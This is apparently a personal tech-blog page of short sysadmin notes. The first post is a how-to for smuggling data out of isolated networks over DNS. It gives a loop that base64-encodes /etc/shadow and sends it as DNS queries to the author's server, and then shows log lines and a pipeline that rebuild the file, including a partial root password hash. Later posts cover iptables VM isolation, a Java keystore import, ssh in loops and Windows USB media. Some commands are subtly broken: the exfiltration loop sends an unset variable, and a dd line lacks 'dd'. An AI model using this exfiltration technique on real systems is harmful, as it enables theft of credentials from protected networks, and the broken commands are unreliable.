Bitbull Tech Notes - home of free minds ...

transport protected data out of high secured zones by dns requests

I often spend some time in highly isolated and secured networks.
Companies spend a lot of money to protect their sensitive data.

But so far I see often that restrictions are not tight enough.

Since layer7 inspection of https traffic has become a standard, DNS filtering has not.

Getting data out of secure zones by DNS requests is quite easy, so lets start with this example.

What you need to get it running:

  • A server within a secured Zone to push some data out.
  • A Server in the internet where you can read the logs.

 

So lets push out the data from secure zone:

cat /etc/shadow | base64 -w63 | while read line
do 
   host  -tA $L.debug2.org 1.2.3.4
done

This command encoded and transferred the linux password file to my dns server, listening at IP 1.2.3.4

On the target side, I easily can reconstruct the data:

[root@ns ~]# grep debug2.org /var/log/messages | tail -2
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 pan named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied

[root@pan ~]# grep debug2.org /var/log/messages | cut -d'(' -f2- | cut -d'.' -f1 | base64 -d root:$6$QMXJFcGY$TkVB1fdrSBzM9nlhO...rsPIc3F.35TN2sloEuQofCFO4SSE9Z3/:17760:0:99999:7::: [...] _chrony:*:17760:0:99999:7:::

 

Sometimes, character cases get converted to capital or verse, but in this case it is easy to do the same with base32 or uuencode.

This is not mentioned to be used against the law, but should help to get aware of security ... and its problems.

Thanks

 

 

 

 

 

Quick and dirty isolate 10 vms on kvm host from accessing network

PROD NET: 192.168.1.0/24

VM IP RANGE TO ISOLATE: 192.168.1.221-230

service iptables restart
# last rule, reject all
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.0.0/16 -j REJECT

# accept from test net to dns/dhcp
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst 192.168.1.50/32 -j ACCEPT

# accept from test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# accept from NOT test net to test net
iptables -I FORWARD -m physdev --physdev-is-bridged -m iprange \! --src-range 192.168.1.221-192.168.1.230 --dst-range 192.168.1.221-192.168.1.230 -j ACCEPT

# enable conntracking
iptables -I FORWARD -m physdev --physdev-is-bridged -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

echo "--- ISOLATED CLASSROM FROM PROD NETWORK ... DONE"

 

Add CA Cert to vRealize Automation CertStore

Problem was:

I generated self signed ca chain with wildcard.

After successfull import, vRA health check started whining about the unkown ca cert:

sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

Then I added the ca cert to java certstore and rebootet ... now it is green again:

vra1:~ # keytool -import -trustcacerts -file /root/ca.crt -alias vra.lab.local -keystore /usr/java/jre-vmware/lib/security/cacerts
Enter keystore password:
Certificate already exists in keystore under alias <load-balancer>
Do you still want to add it? [no]:  yes
Certificate was added to keystore
vra1:~ # keytool -import -trustcacerts -file /root/ca.crt -alias web.lab.local -keystore /usr/java/jre-vmware/lib/security/cacerts
Enter keystore password:
Certificate already exists in keystore under alias <load-balancer>
Do you still want to add it? [no]:  yes
Certificate was added to keystore

Why SSH is breaking bash loops and how to get around

[root@kvm2 bin]# seq 3 | while read i; do echo $i; done
1
2
3
[root@kvm2 bin]# seq 3 | while read i; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:46 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh kvm1 date ; done
1
Wed Sep 13 15:55:54 CEST 2017
2
Wed Sep 13 15:55:54 CEST 2017
3
Wed Sep 13 15:55:54 CEST 2017
[root@kvm2 bin]# for i in $(seq 3) ; do echo $i ; ssh -n kvm1 date ; done
1
Wed Sep 13 15:56:03 CEST 2017
2
Wed Sep 13 15:56:04 CEST 2017
3
Wed Sep 13 15:56:04 CEST 2017

Create Windows 7 USB boot media

Not that easy as with linux, but also not that hard

fdisk /dev/sdh    # create partition as shown below

fdisk -l /dev/sdh
   Device Boot      Start         End      Blocks   Id  System
    /dev/sdh1            2048     7864319     3931136    7  HPFS/NTFS/exFAT

mkfs.ntfs -f /dev/sdh1

if=/usr/lib/syslinux/bios/mbr.bin of=/dev/sdh   # use mbr.bin from syslinux package

mkdir /tmp/iso /tmp/usb

mount SW_DVD5_Win_Pro_7_64BIT.ISO /tmp/iso/
mount /dev/sdh1 /tmp/usb/

cp -rv /tmp/iso/* /tmp/usb/

umount /tmp/iso
umount /tmp/usb
Home ← Older posts